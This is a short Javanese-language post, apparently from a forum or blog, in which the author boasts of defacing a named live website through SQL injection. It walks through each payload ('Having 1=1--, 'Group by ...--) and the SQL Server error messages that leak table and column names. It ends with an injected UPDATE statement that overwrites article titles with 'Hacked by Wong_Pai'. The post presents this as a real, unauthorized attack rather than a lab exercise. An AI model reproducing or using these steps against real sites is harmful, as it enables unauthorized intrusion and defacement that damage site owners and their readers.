Kerjaan neng kantor gawe aku suntuk... Iseng2 ane browsing bae lah neng internet Pas buka situs rusia http://www.yeshgvul.org/news.asp?id=5976cbc9a396c7f525349fe15a893e71 muncul niatan nggo utak atik nggo ngehack...
Pertama ane tambahi tanda petik siji(') neng mburine id dadine http://www.yeshgvul.org/news.asp?id=5976cbc9a396c7f525349fe15a893e71'
aku kayong bungah nemen. Soale metu pesan eror = Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '5976cbc9a396c7f525349fe15a893e71''
/news.asp, line 64. Berarti ana hole neng kene.... trus pa maning????
kedua, aku coba tambahi maning tulisan 'Having 1=1-- dadine http://www.yeshgvul.org/news.asp?id=5976cbc9a396c7f525349fe15a893e71'Having 1=1--
eh malah muncul sing tak arep2 kiye metuna=Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'articles.ArticleID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/news.asp, line 64. selanjute.....
ketiga tak tambahi maning nggo tulisan 'Group+by+articles.ArticleID-- dadine=http://www.yeshgvul.org/news.asp?id=5976cbc9a396c7f525349fe15a893e71'Group+by+articles.ArticleID--. Metu pesan error =
Microsoft OLE DB Provider for ODBC Driver serror '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'articles.VortalCode' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.</font>
/news.asp, line 64
terus............
Keempat terus tak goleti terus tabele sampe ketemu table sing arane Title
Trus tak inject nggo perintah SQL 'Update+articles+set+Title='<h1>Hacked by Wong_Pai</h1>;'--
Kelima barang tak buka maning http://www.yeshgvul.org/news.asp?id=5976cbc9a396c7f525349fe15a893e71 oopsss!!!!
Tulisane wes berubah Hacked by Wong_Pai
Wes kaya kue bae..........yah............